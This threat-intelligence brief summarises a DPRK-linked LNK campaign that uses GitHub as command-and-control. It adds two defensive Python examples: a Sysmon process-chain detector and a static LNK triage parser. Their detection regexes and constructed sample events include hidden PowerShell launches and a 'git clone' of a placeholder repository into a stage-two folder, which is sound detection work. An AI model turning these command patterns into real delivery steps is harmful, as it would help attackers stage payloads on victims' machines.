DPRK‑Linked Hackers Exploit GitHub as C2 in Multi‑Stage LNK Attacks Targeting South Korean Organizations
What Happened — Fortinet’s FortiGuard Labs identified a nation‑state threat group linked to the Democratic People’s Republic of Korea using GitHub repositories as command‑and‑control (C2) servers. The campaign begins with obfuscated Windows shortcut (LNK) files that drop a decoy PDF and then pull malicious payloads from those GitHub repositories.
Why It Matters for TPRM —
- Public code‑hosting platforms can be weaponised, turning a trusted service into a covert C2 channel.
- Multi‑stage attacks bypass traditional perimeter defenses, increasing the risk of data exfiltration or ransomware.
- Organizations that rely on third‑party SaaS or cloud‑based development tools may inadvertently expose themselves to the same vector.
Who Is Affected — South Korean enterprises across technology, finance, manufacturing, and government sectors that accept external files or interact with public repositories.
Recommended Actions —
- Review and tighten inbound traffic inspection for GitHub and other public code‑hosting domains.
- Deploy LNK‑file sandboxing and block execution of unsigned shortcuts.
- Enforce strict URL filtering and threat‑intel‑driven IOC blocking for known malicious GitHub repositories.
- Conduct a supply‑chain risk assessment of any third‑party tools that pull code from public repositories.
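The first two recommendations (inspect GitHub‑bound traffic, sandbox LNK execution) translate into endpoint telemetry logic: a shortcut double‑clicked from Explorer shows up as explorer.exe spawning a script interpreter with a hidden window, and the stage‑two fetch shows up as a GitHub URL in that process or one of its children. The following is an added detection example written for this note, not code from Fortinet, FortiGuard Labs or The Hacker News. The events are constructed Sysmon Event ID 1 (process create) records serialised as JSON lines, and the GitHub URLs in them are placeholders, not indicators from the report; field names follow Sysmon's process‑create schema.

```python
"""Detect the explorer.exe -> hidden PowerShell -> GitHub fetch chain in process telemetry.

Added example (not FortiGuard's, Fortinet's or The Hacker News' code). SAMPLE_LOG is
CONSTRUCTED Sysmon Event ID 1 data; every URL in it is a placeholder.
"""
import json
import re

GITHUB_HOSTS = ("github.com", "raw.githubusercontent.com",
                "objects.githubusercontent.com", "api.github.com")
INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe")
# Hidden-window or policy-bypass switches typical of script launched from a shortcut
HIDDEN_OR_BYPASS = re.compile(
    r"-(w(indowstyle)?\s+h(idden)?|nop|noprofile|e(nc|ncodedcommand)|ep\s+bypass)\b", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def has_github_url(cmd: str) -> bool:
    cmd = cmd.lower()
    return any(h in cmd for h in GITHUB_HOSTS)


def ancestor_in(event: dict, guids: set, by_guid: dict, max_depth: int = 8) -> bool:
    """Walk ParentProcessGuid links upward (starting at the parent) looking for a flagged process."""
    cur = by_guid.get(event.get("ParentProcessGuid"))
    for _ in range(max_depth):
        if cur is None:
            return False
        if cur["ProcessGuid"] in guids:
            return True
        cur = by_guid.get(cur.get("ParentProcessGuid"))
    return False


def detect(json_lines) -> list:
    """Return alerts: stage 1 = Explorer-launched interpreter with hidden/bypass switches;
    stage 2 = any descendant of a stage-1 process whose command line references GitHub."""
    events = [json.loads(line) for line in json_lines if line.strip()]
    events = [e for e in events if e.get("EventID") == 1]
    by_guid = {e["ProcessGuid"]: e for e in events}
    alerts, stage1 = [], set()
    for e in events:
        cmd = e.get("CommandLine", "")
        if (basename(e["ParentImage"]) == "explorer.exe"
                and basename(e["Image"]) in INTERPRETERS
                and HIDDEN_OR_BYPASS.search(cmd)):
            stage1.add(e["ProcessGuid"])
            alerts.append({"rule": "lnk_like_interpreter_launch", "guid": e["ProcessGuid"],
                           "github": has_github_url(cmd)})
    for e in events:
        if has_github_url(e.get("CommandLine", "")) and ancestor_in(e, stage1, by_guid):
            alerts.append({"rule": "github_fetch_under_suspicious_interpreter",
                           "guid": e["ProcessGuid"]})
    return alerts


# CONSTRUCTED sample: two malicious-chain events followed by two benign look-alikes.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"EventID": 1, "UtcTime": "2025-01-01 09:00:01.000", "ProcessGuid": "{P-0001}",
     "ParentProcessGuid": "{P-0000}", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -nop -c "<placeholder stage-two fetch from '
                    'https://raw.githubusercontent.com/PLACEHOLDER-ORG/PLACEHOLDER-REPO/main/stage2>"'},
    {"EventID": 1, "UtcTime": "2025-01-01 09:00:02.000", "ProcessGuid": "{P-0002}",
     "ParentProcessGuid": "{P-0001}",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Program Files\Git\cmd\git.exe",
     "CommandLine": r"git clone https://github.com/PLACEHOLDER-ORG/PLACEHOLDER-REPO C:\Users\Public\stage2"},
    # benign: a real PDF opened from Explorer (no interpreter involved)
    {"EventID": 1, "UtcTime": "2025-01-01 09:05:00.000", "ProcessGuid": "{P-0003}",
     "ParentProcessGuid": "{P-0000}", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\PDFReader\reader.exe",
     "CommandLine": r'"C:\Program Files\PDFReader\reader.exe" C:\Users\alice\Downloads\invoice.pdf'},
    # benign: a developer's IDE cloning from GitHub, no suspicious interpreter in the chain
    {"EventID": 1, "UtcTime": "2025-01-01 09:10:00.000", "ProcessGuid": "{P-0004}",
     "ParentProcessGuid": "{P-0010}", "ParentImage": r"C:\Users\alice\AppData\Local\Programs\IDE\ide.exe",
     "Image": r"C:\Program Files\Git\cmd\git.exe",
     "CommandLine": r"git clone https://github.com/PLACEHOLDER-ORG/internal-tool"},
])

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

Only the two chain events alert; the IDE's `git clone` is ignored because nothing in its ancestry was flagged, which is what keeps a rule like this usable in an environment where developers legitimately pull from GitHub all day.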
Technical Notes — The initial LNK file is heavily obfuscated to evade static analysis and drops a benign‑looking PDF to gain user trust. Once executed, the shortcut runs a PowerShell script that clones a malicious GitHub repo, retrieves additional binaries, and establishes a persistent back‑door. No specific CVE is cited; the attack leverages legitimate GitHub functionality rather than a software flaw. Source: The Hacker News
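Because the shortcut's target and arguments are stored in fixed, documented fields ([MS‑SHLLINK] header plus StringData), a static triage pass can pull them out without executing anything, regardless of how the PowerShell inside is obfuscated. The following is an added example written for this note, not code from FortiGuard Labs or The Hacker News: a minimal LNK parser plus a scoring of the indicators the paragraph above describes (script interpreter as target, hidden window, PowerShell bypass switches, GitHub host in the arguments). The sample shortcut is constructed in memory by the `build_sample_lnk` helper, and the URL inside it is a placeholder, not an indicator from the report.

```python
"""Static triage of a Windows shortcut (.lnk) for the LNK -> PowerShell -> GitHub chain.

Added example (not FortiGuard's or The Hacker News' code). The shortcuts below are
CONSTRUCTED from the [MS-SHLLINK] layout; the GitHub URL is a placeholder.
"""
import re
import struct

# LinkCLSID {00021401-0000-0000-C000-000000000046}, little-endian as stored on disk
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits ([MS-SHLLINK] 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWNORMAL, SW_SHOWMINNOACTIVE = 1, 7   # ShowCommand values; 7 starts the window minimised

GITHUB_HOSTS = ("github.com", "raw.githubusercontent.com", "objects.githubusercontent.com")
BYPASS_SWITCHES = re.compile(r"-(nop|noprofile|ep\s+bypass|executionpolicy\s+bypass|enc|encodedcommand)\b")
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+h(idden)?\b")


def parse_lnk(data: bytes) -> dict:
    """Parse ShellLinkHeader and StringData; LinkTargetIDList/LinkInfo are skipped by size."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_cmd = struct.unpack_from("<I", data, 60)[0]
    offset = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:
        offset += 2 + struct.unpack_from("<H", data, offset)[0]   # IDListSize + list
    if flags & HAS_LINK_INFO:
        offset += struct.unpack_from("<I", data, offset)[0]       # LinkInfoSize includes itself
    info = {"flags": flags, "show_command": show_cmd}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, offset)[0]
        offset += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[offset:offset + count * width]
        info[name] = raw.decode("utf-16-le") if width == 2 else raw.decode("cp1252", "replace")
        offset += count * width
    return info


def triage_lnk(info: dict) -> list:
    """List the indicators of the described chain that a parsed shortcut exhibits."""
    findings = []
    target = (info.get("relative_path", "") + " " + info.get("working_dir", "")).lower()
    args = info.get("arguments", "")
    if any(t in target for t in ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript")):
        findings.append("target is a script/command interpreter, not a document")
    if info.get("show_command") == SW_SHOWMINNOACTIVE or HIDDEN_WINDOW.search(args.lower()):
        findings.append("console window hidden or minimised")
    if BYPASS_SWITCHES.search(args.lower()):
        findings.append("PowerShell profile/policy bypass or encoded command in arguments")
    if any(h in args.lower() for h in GITHUB_HOSTS):
        findings.append("arguments reference a GitHub host (possible stage-two fetch / C2)")
    if len(args) > 260:
        findings.append(f"unusually long argument string ({len(args)} chars)")
    return findings


def triage_bytes(data: bytes) -> list:
    return triage_lnk(parse_lnk(data))


def build_sample_lnk(relative_path: str, arguments: str, show_command: int) -> bytes:
    """CONSTRUCTED minimal shortcut: 0x4C-byte header + Unicode RelativePath and Arguments."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID
    header += struct.pack("<II", flags, 0x20)                  # LinkFlags, FILE_ATTRIBUTE_ARCHIVE
    header += b"\x00" * 24                                      # Creation/Access/Write FILETIMEs
    header += struct.pack("<IIIHHII", 0, 0, show_command, 0, 0, 0, 0)  # FileSize..Reserved3
    assert len(header) == 0x4C
    def string_data(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + string_data(relative_path) + string_data(arguments)


# Constructed sample mimicking the chain; the URL is a placeholder, not a real indicator.
SAMPLE_ARGS = ('-w hidden -nop -c "<placeholder stage-two fetch from '
               'https://raw.githubusercontent.com/PLACEHOLDER-ORG/PLACEHOLDER-REPO/main/stage2>"')
SAMPLE_LNK = build_sample_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                              SAMPLE_ARGS, SW_SHOWMINNOACTIVE)
# Constructed benign shortcut for contrast: a plain document link with a normal window.
BENIGN_LNK = build_sample_lnk(r"..\Documents\quarterly_report.pdf", "", SW_SHOWNORMAL)

if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_LNK), ("benign", BENIGN_LNK)):
        print(label, triage_bytes(blob))
```

Run the triage on every shortcut arriving by mail or download before it reaches a desktop; a document‑named `.lnk` whose target is an interpreter is already enough to quarantine, and the remaining indicators explain the verdict to the analyst.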